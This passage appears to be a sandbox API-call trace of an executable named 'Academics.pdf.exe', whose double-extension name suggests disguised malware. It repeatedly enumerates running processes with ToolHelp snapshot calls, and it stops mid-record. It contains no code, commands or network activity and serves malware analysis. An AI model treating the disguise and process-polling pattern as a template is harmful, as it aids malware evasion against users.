1 [0317.132] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0317.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0317.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0317.134] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0317.135] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0317.135] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0317.136] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0317.137] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0317.138] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0317.139] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0317.139] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0317.140] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0317.141] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0317.141] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0317.142] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0317.143] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.143] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0317.144] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.145] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0317.145] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0317.146] CloseHandle (hObject=0x294) returned 1 [0317.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0317.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0317.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0317.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0317.146] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0317.147] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0317.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0317.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0317.147] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0317.149] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.149] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0317.150] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0317.151] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.151] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0317.152] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.153] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0317.153] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0317.154] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0317.154] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0317.155] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.156] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.156] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.157] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.158] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.158] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0317.159] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.160] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.160] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0317.161] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0317.161] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0317.162] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0317.163] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.163] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0317.164] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0317.165] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0317.166] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0317.166] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0317.167] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0317.168] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0317.169] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0317.169] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0317.170] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0317.170] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0317.171] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0317.172] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0317.173] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0317.174] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0317.174] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0317.175] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0317.176] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0317.177] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0317.177] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.178] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0317.179] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.179] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0317.180] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0317.181] CloseHandle (hObject=0x294) returned 1 [0317.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.181] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.181] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.181] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0317.182] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.183] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0317.184] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0317.184] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.185] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0317.186] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.186] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0317.187] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0317.187] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0317.188] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0317.189] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, 